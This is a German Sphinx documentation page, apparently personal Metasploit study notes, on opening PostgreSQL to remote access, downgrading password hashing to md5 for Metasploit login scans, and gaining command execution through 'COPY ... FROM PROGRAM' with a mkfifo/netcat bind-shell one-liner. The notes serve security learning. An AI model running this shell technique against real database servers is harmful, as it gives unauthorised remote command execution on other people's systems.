
<!DOCTYPE html>

<html lang="de">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="generator" content="Docutils 0.17.1: http://docutils.sourceforge.net/" />

    <title>Konfiguration &#8212; MSP 0.1 Dokumentation</title>
    <link rel="stylesheet" type="text/css" href="_static/pygments.css" />
    <link rel="stylesheet" type="text/css" href="_static/alabaster.css" />
    <script data-url_root="./" id="documentation_options" src="_static/documentation_options.js"></script>
    <script src="_static/jquery.js"></script>
    <script src="_static/underscore.js"></script>
    <script src="_static/doctools.js"></script>
    <script src="_static/translations.js"></script>
    <link rel="index" title="Stichwortverzeichnis" href="genindex.html" />
    <link rel="search" title="Suche" href="search.html" />
    <link rel="prev" title="Links" href="linkliste.html" />
   
  <link rel="stylesheet" href="_static/custom.css" type="text/css" />
  
  
  <meta name="viewport" content="width=device-width, initial-scale=0.9, maximum-scale=0.9" />

  </head><body>
  

    <div class="document">
      <div class="documentwrapper">
        <div class="bodywrapper">
          

          <div class="body" role="main">
            
  <section id="konfiguration">
<span id="postgresql"></span><h1>Konfiguration<a class="headerlink" href="#konfiguration" title="Link zu dieser Überschrift">¶</a></h1>
<section id="remote-access-ermoglichen">
<h2>Remote Access ermöglichen<a class="headerlink" href="#remote-access-ermoglichen" title="Link zu dieser Überschrift">¶</a></h2>
<ol class="arabic">
<li><dl>
<dt>/etc/postgresql/14/main/postgresql.conf</dt><dd><dl class="simple">
<dt># Listen Adresse auf alle Interfaces setzen</dt><dd><p>listen_addresses = ‚*‘</p>
</dd>
</dl>
<p># password_encryption
password_encryption = md5    # scram-sha-256 or md5</p>
<p><em>Password Encryption sollte man auf dem default-Wert „scram-sha-256“ lassen. Für metasploit Tests kann man das auf
md5 setzen. Wenn vorher aber User/Role mit scram-sha-256 angelegt wurden, sind die Passwörter mit dem Verfahren
verschlüsselt worden. Daher muss man die Passwörter neu vergeben, ansonsten liefert Metasploit folgende Fehlermeldung
beim exploit „scanner/postgres/postgres_login“</em></p>
<div class="highlight-shell notranslate"><div class="highlight"><pre><span></span><span class="o">[</span>-<span class="o">]</span> &lt;IP&gt;:5432 - LOGIN FAILED: admin:admin@mydb <span class="o">(</span>Incorrect: unknown auth <span class="nb">type</span> <span class="s1">&#39;10&#39;</span> with buffer content:
<span class="m">52</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">17</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> 0a <span class="m">53</span> <span class="m">43</span> <span class="m">52</span> <span class="m">41</span> 4d 2d <span class="m">53</span>    <span class="p">|</span>R........SCRAM-S<span class="p">|</span>
<span class="m">48</span> <span class="m">41</span> 2d <span class="m">32</span> <span class="m">35</span> <span class="m">36</span> <span class="m">00</span> <span class="m">00</span>                            <span class="p">|</span>HA-256..<span class="p">|</span>
</pre></div>
</div>
</dd>
</dl>
</li>
<li><p>/etc/postgresql/14/main/pg_hba.conf</p>
<blockquote>
<div><dl class="simple">
<dt># Netzwerkbereich zulassen, der zugreifen darf</dt><dd><p>host    all             all             &lt;IP Netz&gt;/24        md5</p>
</dd>
</dl>
</div></blockquote>
</li>
<li><p>systemctl restart postgresql</p></li>
<li><p>lsof -i:5432</p></li>
<li><p>less /var/log/postgresql/postgresql-14-main.log</p></li>
<li><p>psql -h &lt;IP&gt; -p 5432 -d &lt;DB&gt; -U &lt;user&gt; -W</p></li>
</ol>
<section id="command-execution-with-copy-command">
<h3>Command Execution with COPY Command<a class="headerlink" href="#command-execution-with-copy-command" title="Link zu dieser Überschrift">¶</a></h3>
<p>Quelle: <a class="reference external" href="https://medium.com/r3d-buck3t/command-execution-with-postgresql-copy-command-a79aef9c2767">https://medium.com/r3d-buck3t/command-execution-with-postgresql-copy-command-a79aef9c2767</a></p>
<p>In diesem Szenario erfolgt eine remote Anmeldung an die postgres-Datenbank; es wird ein Listener eingerichtet, um beliebige
Befehle auf dem Zielhost abzusetzen.</p>
<ol class="arabic">
<li><p>Anmelden an Datenbanken mit Admin-User:</p>
<div class="highlight-default notranslate"><div class="highlight"><pre><span></span><span class="n">psql</span> <span class="o">-</span><span class="n">h</span> <span class="o">&lt;</span><span class="n">Zielhost</span><span class="o">&gt;</span> <span class="o">-</span><span class="n">U</span> <span class="o">&lt;</span><span class="n">User</span><span class="o">&gt;</span> <span class="o">-</span><span class="n">d</span> <span class="o">&lt;</span><span class="n">Datenbank</span><span class="o">&gt;</span> <span class="o">-</span><span class="n">W</span>
</pre></div>
</div>
</li>
<li><p>Remote Listener einrichten:</p>
<div class="highlight-default notranslate"><div class="highlight"><pre><span></span><span class="n">COPY</span> <span class="n">shell</span> <span class="n">FROM</span> <span class="n">PROGRAM</span> <span class="s1">&#39;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2&gt;&amp;1 | nc -l &lt;Zielhost&gt; &lt;PORT&gt; &gt; /tmp/f&#39;</span><span class="p">;</span>
</pre></div>
</div>
</li>
<li><p>in einer neuen Shell können dann bash Befehle abgesetzt werden:</p>
<div class="highlight-default notranslate"><div class="highlight"><pre><span></span><span class="n">nc</span> <span class="o">&lt;</span><span class="n">Zielhost</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="n">PORT</span><span class="o">&gt;</span>
</pre></div>
</div>
<p>Befehle werden im Kontext des postgres-Serverprocesses ausgeführt.</p>
</li>
</ol>
<p>Zurück zu <a class="reference internal" href="#postgresql"><span class="std std-ref">Konfiguration</span></a></p>
</section>
</section>
</section>


          </div>
          
        </div>
      </div>
      <div class="sphinxsidebar" role="navigation" aria-label="main navigation">
        <div class="sphinxsidebarwrapper">
<h1 class="logo"><a href="index.html">MSP</a></h1>








<h3>Navigation</h3>
<p class="caption" role="heading"><span class="caption-text">Contents:</span></p>
<ul class="current">
<li class="toctree-l1"><a class="reference internal" href="grundlagen.html">Grundlagen</a></li>
<li class="toctree-l1"><a class="reference internal" href="filestruktur.html">Filestruktur</a></li>
<li class="toctree-l1"><a class="reference internal" href="msf_commands.html">Basisbefehle</a></li>
<li class="toctree-l1"><a class="reference internal" href="linkliste.html">Links</a></li>
<li class="toctree-l1 current"><a class="current reference internal" href="#">PostgreSQL</a><ul>
<li class="toctree-l2"><a class="reference internal" href="#remote-access-ermoglichen">Remote Access ermöglichen</a></li>
</ul>
</li>
</ul>

<div class="relations">
<h3>Related Topics</h3>
<ul>
  <li><a href="index.html">Documentation overview</a><ul>
      <li>Previous: <a href="linkliste.html" title="vorheriges Kapitel">Links</a></li>
  </ul></li>
</ul>
</div>
<div id="searchbox" style="display: none" role="search">
  <h3 id="searchlabel">Schnellsuche</h3>
    <div class="searchformwrapper">
    <form class="search" action="search.html" method="get">
      <input type="text" name="q" aria-labelledby="searchlabel" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/>
      <input type="submit" value="Los" />
    </form>
    </div>
</div>
<script>$('#searchbox').show(0);</script>








        </div>
      </div>
      <div class="clearer"></div>
    </div>
    <div class="footer">
      &copy;2023, ArZieg.
      
      |
      Powered by <a href="http://sphinx-doc.org/">Sphinx 4.4.0</a>
      &amp; <a href="https://github.com/bitprophet/alabaster">Alabaster 0.7.12</a>
      
      |
      <a href="_sources/postgresql.rst.txt"
          rel="nofollow">Page source</a>
    </div>

    

    
  </body>
</html>